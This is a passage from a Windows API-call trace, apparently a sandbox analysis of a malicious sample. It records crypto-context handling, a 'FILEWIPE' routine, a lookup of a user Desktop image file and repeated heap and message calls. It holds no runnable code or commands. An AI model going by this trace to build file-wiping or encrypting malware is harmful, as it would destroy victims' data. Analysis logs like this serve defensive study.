wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.082] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.082] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.082] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.082] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.082] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.083] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.083] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0167.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.083] FreeLibrary (hLibModule=0x74f20000) returned 1 [0167.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.084] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.088] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.089] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.089] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0167.089] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="s1epd3.png", cAlternateFileName="")) returned 0x90ae18 [0167.092] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.093] CharLowerBuffW (in: lpsz="byte[70792]", cchLength=0xb | out: lpsz="byte[70792]") returned 0xb [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.096] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.096] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.096] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.097] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.098] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0167.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0167.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2828, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.098] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.099] FreeLibrary (hLibModule=0x75c90000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0167.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.101] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) 